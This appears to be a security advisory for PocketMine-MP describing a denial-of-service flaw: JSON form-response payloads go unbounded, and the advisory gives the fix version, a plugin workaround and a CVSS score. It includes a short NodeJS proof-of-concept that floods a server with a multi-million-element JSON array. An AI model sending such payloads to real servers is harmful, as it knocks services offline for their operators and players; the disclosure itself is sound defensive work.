The server does not meaningfully limit the size of the JSON payload in ModalFormResponsePacket. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.
The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.
The issue was fixed in two parts:
This issue can be worked around in a plugin using DataPacketReceiveEvent by:
formData fieldHowever, a full workaround for the issue would require reflection to access the Player->forms property, which is not exposed via any accessible API prior to 5.39.2.
Join a PocketMine-MP server as a regular player (no special permissions needed).
Use a modified client or packet-sending script to send a ModalFormResponsePacket with:
formIdformData containing a massive JSON array (e.g., 10+ MB payload).The server will attempt to parse the JSON and may freeze or become unresponsive.
Example NodeJS pseudocode:
import { createClient } from 'bedrock-protocol';
const host = '127.0.0.1';
const port = 19132;
const username = 'Test';
const client = createClient({
host,
port,
username,
offline: true
});
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';
client.on('spawn', () => {
console.log('[*] Connected & spawned. Sending malicious packet...');
client.write('modal_form_response', {
formId: 9999, // Form inexistant
formData: hugePayload // JSON énorme
});...
5.39.2Exploitability
AV:NAC:LAT:NPR:LUI:NVulnerable System
VC:NVI:NVA:HSubsequent System
SC:NSI:NSA:N7.1/CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N